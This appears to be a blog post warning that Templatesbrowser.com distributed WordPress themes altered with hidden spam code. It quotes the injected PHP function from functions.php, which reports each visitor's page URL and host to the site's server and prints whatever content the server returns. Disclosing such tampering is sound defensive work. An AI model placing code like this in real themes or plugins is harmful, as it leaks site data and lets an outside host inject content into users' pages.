Phishing Site Confirmed – Templatesbrowser.com

Who downloaded Worpdress themes from Templatesbrowser.com please remove it. Templatebrowser altered original themes by inserting hidden spam links.
In 10 minutes ago, Templatesbrowser.com is gone! Removed eh? Afraid eh?
I downloaded (Not so) Fresh theme from there. What i found? Templatesbrowser.com put spam link code in the functions.php file.
function credits()
{
$url = “http://1.templatesbrowser.com/wp.php?” .
“url=” . urlencode($_SERVER['REQUEST_URI']) . “&” . “host=” . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen(“1.templatesbrowser.com”, 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
I strongly recommend that you download directly from the original authors website.
Read more about this ALERT -
http://www.aboutus.org/TemplatesBrowser.com
http://www.onnoot.com/e/532/Templatesbrowser.com_puts_link_spam_in_WordPress
http://www.onnoot.com/e/559/Templatesbrowser.com_puts_phishing_code_in_Joomla
http://forum.joomla.org/index.php/topic,185573.0.html
http://5thirtyone.com/archives/837
Update : Templatebrowser.com still online.



































I think they took their site down after all this got out.